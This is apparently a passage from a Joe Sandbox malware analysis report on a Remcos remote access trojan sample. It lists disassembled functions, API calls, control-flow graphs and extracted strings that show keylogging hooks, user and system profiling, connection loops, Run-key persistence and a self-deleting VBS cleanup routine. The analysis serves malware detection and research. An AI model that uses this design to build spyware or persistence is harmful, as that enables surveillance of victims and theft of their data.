                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000104), ref: 0040D790
                                          • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                        • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-IUHLZ9$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                        • API String ID: 2830904901-2533174582
                                        • Opcode ID: dbcf892a0b8a795771d979b43a87f7b46ac64dc1d8763980b6969b44d710bdae
                                        • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                        • Opcode Fuzzy Hash: dbcf892a0b8a795771d979b43a87f7b46ac64dc1d8763980b6969b44d710bdae
                                        • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                        Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1398 4099e4-4099fd 1399 409a63-409a73 GetMessageA 1398->1399 1400 4099ff-409a19 SetWindowsHookExA 1398->1400 1401 409a75-409a8d TranslateMessage DispatchMessageA 1399->1401 1402 409a8f 1399->1402 1400->1399 1405 409a1b-409a61 GetLastError call 41ad56 call 404c9e call 401f66 call 41a696 call 401eea 1400->1405 1401->1399 1401->1402 1403 409a91-409a96 1402->1403 1405->1403
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                        • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                        • GetLastError.KERNEL32 ref: 00409A1B
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                        • TranslateMessage.USER32(?), ref: 00409A7A
                                        • DispatchMessageA.USER32(?), ref: 00409A85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                        • String ID: Keylogger initialization failure: error $`Wu
                                        • API String ID: 3219506041-303027793
                                        • Opcode ID: 1c1c47e8679d2b224dd733d0129ac0d0ac4193f5d3ce86d790f17fa939d258fc
                                        • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                        • Opcode Fuzzy Hash: 1c1c47e8679d2b224dd733d0129ac0d0ac4193f5d3ce86d790f17fa939d258fc
                                        • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                        Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                        • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                        • ExitProcess.KERNEL32 ref: 0040E672
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                        • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                        • API String ID: 2281282204-3981147832
                                        • Opcode ID: ef5e2cde1c6eacbd3823fb9ed910c6fe3935d25d8f4b30635bdf8653ba33eb6e
                                        • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                        • Opcode Fuzzy Hash: ef5e2cde1c6eacbd3823fb9ed910c6fe3935d25d8f4b30635bdf8653ba33eb6e
                                        • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                        Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                        • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                        Strings
                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$EventLocalThreadTime
                                        • String ID: KeepAlive | Enabled | Timeout:
                                        • API String ID: 2532271599-1507639952
                                        • Opcode ID: a36eacb2df50b02e654fe97b9ad9f3b4b14a6fc902c8466c71e8a12677958319
                                        • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                        • Opcode Fuzzy Hash: a36eacb2df50b02e654fe97b9ad9f3b4b14a6fc902c8466c71e8a12677958319
                                        • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                        Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease
                                        • String ID:
                                        • API String ID: 1815803762-0
                                        • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                        • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                        • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                        • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                        Function 0041A7B2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7CF
                                        • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Name$ComputerUser
                                        • String ID:
                                        • API String ID: 4229901323-0
                                        • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                        • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                        • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                        • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                        Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                                        • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                        • Opcode Fuzzy Hash: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                                        • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                        Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: recv
                                        • String ID:
                                        • API String ID: 1507349165-0
                                        • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                        • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                        • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                        • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                        Function 00413FD4 Relevance: 55.1, APIs: 5, Strings: 26, Instructions: 813sleepnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 447 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 565 4142ca-4142df call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a696 560->566 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 565->582 565->583 566->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 583->596 597 414b8e-414b96 call 401d8c 583->597 596->597 597->476 647->648 654 414474-414830 call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c 648->654 655 41446f-414471 648->655 781 414832 call 404468 654->781 655->654 782 414837-414abb call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 781->782 900 414ac0-414ac7 782->900 901 414ac9-414ad0 900->901 902 414adb-414ae2 900->902 901->902 905 414ad2-414ad4 901->905 903 414ae4-414ae9 call 40a767 902->903 904 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 902->904 903->904 916 414b22-414b2e CreateThread 904->916 917 414b34-414b4f call 401eea * 2 call 401e13 904->917 905->902 916->917 917->583
                                        APIs
                                        • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                        • WSAGetLastError.WS2_32 ref: 00414249
                                        • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ErrorLastLocalTime
                                        • String ID: | $%I64u$5.3.0 Pro$@CG$@|$C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-IUHLZ9$TLS Off$TLS On $TUF$XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                        • API String ID: 524882891-3896684858
                                        • Opcode ID: d87e8caa7572595075e7298c32b86889769859a0b55a2115f334d47f6d2759e2
                                        • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                        • Opcode Fuzzy Hash: d87e8caa7572595075e7298c32b86889769859a0b55a2115f334d47f6d2759e2
                                        • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                        Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 924 40bf04-40bf1a call 411699 927 40bf26-40bf2f 924->927 928 40bf1c-40bf21 call 40afba 924->928 929 40bf31 call 418c18 927->929 930 40bf36-40bf3d 927->930 928->927 929->930 933 40bf50-40bf60 930->933 934 40bf3f-40bf4b call 401e07 call 41b43f 930->934 936 40bf62-40bf71 call 401e07 call 41297a 933->936 937 40bf77-40bf82 933->937 934->933 954 40bf76 936->954 940 40bf84-40bf90 call 401e07 call 41297a 937->940 941 40bf96-40bf9c 937->941 955 40bf95 940->955 943 40bfb3-40c007 call 436060 call 4022f8 call 401e8f * 2 call 41265d 941->943 944 40bf9e-40bfb2 call 401e07 call 41297a 941->944 966 40c019-40c047 call 401e8f RegDeleteKeyA call 406a1a 943->966 967 40c009-40c013 GetModuleFileNameW 943->967 944->943 954->937 955->941 972 40c058-40c11d SetFileAttributesW call 41ab48 call 41ae18 call 4028cf call 401e13 call 401eea call 43ac1f call 403b40 call 4028cf call 403cdc call 401e13 * 2 call 403b40 call 403cbb call 401e13 966->972 973 40c049-40c056 call 401e07 SetFileAttributesW 966->973 967->966 1004 40c176-40c1d0 call 403b40 call 4028cf * 2 call 402de3 call 401e13 * 3 972->1004 1005 40c11f-40c171 call 403b40 call 403cbb call 4028cf call 402de3 call 401e13 * 3 972->1005 973->972 1033 40c1e0-40c1f0 call 406a1a 1004->1033 1034 40c1d2-40c1db call 4082d2 1004->1034 1005->1004 1038 40c1f2-40c22a call 40b0dd call 4028cf call 402de3 call 401e13 * 2 1033->1038 1039 40c22f-40c26b call 4082d2 call 401e07 call 4022f8 call 401e07 call 41b59f 1033->1039 1034->1033 1038->1039 1059 40c286-40c287 ExitProcess 1039->1059 1060 40c26d-40c280 call 401e07 ShellExecuteW 1039->1060 1060->1059
                                        APIs
                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                        • ExitProcess.KERNEL32 ref: 0040C287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                        • API String ID: 3797177996-1998216422
                                        • Opcode ID: b7c335a9a57edc8c0d96284173e756a4cf762b7bc0f9a63fe277658faa23f341
                                        • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                        • Opcode Fuzzy Hash: b7c335a9a57edc8c0d96284173e756a4cf762b7bc0f9a63fe277658faa23f341
                                        • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                        Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0040A456
                                        • Sleep.KERNEL32(000001F4), ref: 0040A461
                                        • GetForegroundWindow.USER32 ref: 0040A467
                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                        • Sleep.KERNEL32(000003E8), ref: 0040A574
                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                        • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                        • API String ID: 911427763-1497357211
                                        • Opcode ID: 04cc7eafda87e2f954416aa54820f6384b634bf120f851fbe548fbfea1a1b6bc
                                        • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                        • Opcode Fuzzy Hash: 04cc7eafda87e2f954416aa54820f6384b634bf120f851fbe548fbfea1a1b6bc
                                        • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                        Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
